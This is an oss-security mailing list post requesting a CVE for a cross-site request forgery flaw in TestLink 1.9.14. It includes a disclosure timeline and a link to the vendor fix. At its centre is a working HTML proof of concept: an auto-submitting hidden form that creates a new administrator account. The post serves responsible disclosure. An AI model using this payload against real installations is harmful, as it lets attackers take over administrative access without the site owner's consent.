|
Message-ID: <CALySL4Sh96-M5rgow-9xQ=HUH1JeAsiDi6pcHCT6X2F87b1Fdg@mail.gmail.com> Date: Sun, 8 Nov 2015 20:01:42 +0530 From: Aravind <altoarun@...il.com> To: oss-security@...ts.openwall.com Subject: CVE Request: TestLink 1.9.14 CSRF Vulnerability Can a CVE be assigned to the following ? Information ================================= Name: CSRF Vulnerability in TestLink 1.9.14 Affected Software: TestLink Affected Versions: 1.9.14 and possibly below Vendor Homepage: http://testlink.org/ Severity: High Status: Fixed Vulnerability Type: ================================= Cross Site Request Forgery (CSRF) CVE Reference: ================================= Not assigned Technical Details: ================================= Even though the use of CSRF tokens are being implemented in the application, they aren't properly validated at the server side. This allows malicious requests to be generated by the attacker and get them processed by the server on behalf of the victim. By exploiting the vulnerability, the attacker will be able to create user accounts with administrator privileges on the application. Exploit Code ================================= <html lang="en"> <head> <title>CSRF Exploit to Create New Administrator Account</title> </head> <body> <form action="http://localhost/testlink_1_9_14/lib/usermanagement/usersEdit.php" id="formid" method="post"> <input type="hidden" name="CSRFName" value="" /> <input type="hidden" name="CSRFToken" value="" /> <input type="hidden" name="user_id" value="" /> <input type="hidden" name="user_login" value="" /> <input type="hidden" name="login" value="new_admin" /> <input type="hidden" name="firstName" value="new_administrator_fname" /> <input type="hidden" name="lastName" value="new_administrator_lname" /> <input type="hidden" name="password" value="new_administrator_password" /> <input type="hidden" name="emailAddress" value="new_administrator@...in.com" /> <input type="hidden" name="rights_id" value="8" /> <input type="hidden" name="locale" value="en_GB" /> <input type="hidden" name="authentication" value="" /> <input type="hidden" name="user_is_active" value="on" /> <input type="hidden" name="doAction" value="doCreate" /> <input type="hidden" name="do_update" value="Save" /> </form> <script> document.getElementById('formid').submit(); </script> </body> </html> Exploitation Technique: =================================== Remote Severity Level: =================================== High Advisory Timeline =================================== Sat, 7 Nov 2015 13:14:33 +0530 - First Contact Sat, 7 Nov 2015 08:52:14 +0100 - Vendor Response Sat, 7 Nov 2015 13:00:54 +0100 - Vendor Fixed Sun, 8 Nov 2015 19:03:00 +0530 - Public Disclosure Solution ==================================== This vulnerability is fixed in TestLink 1.9.15 (Tauriel) Fix: https://github.com/TestLinkOpenSourceTRMS/testlink-code/commit/1cb1f78f1a50f6e6819bcbadeae345eb3213c487 Credits & Authors ==================================== Aravind C Ajayan, Balagopal N
Powered by blists - more mailing lists
Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.
Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.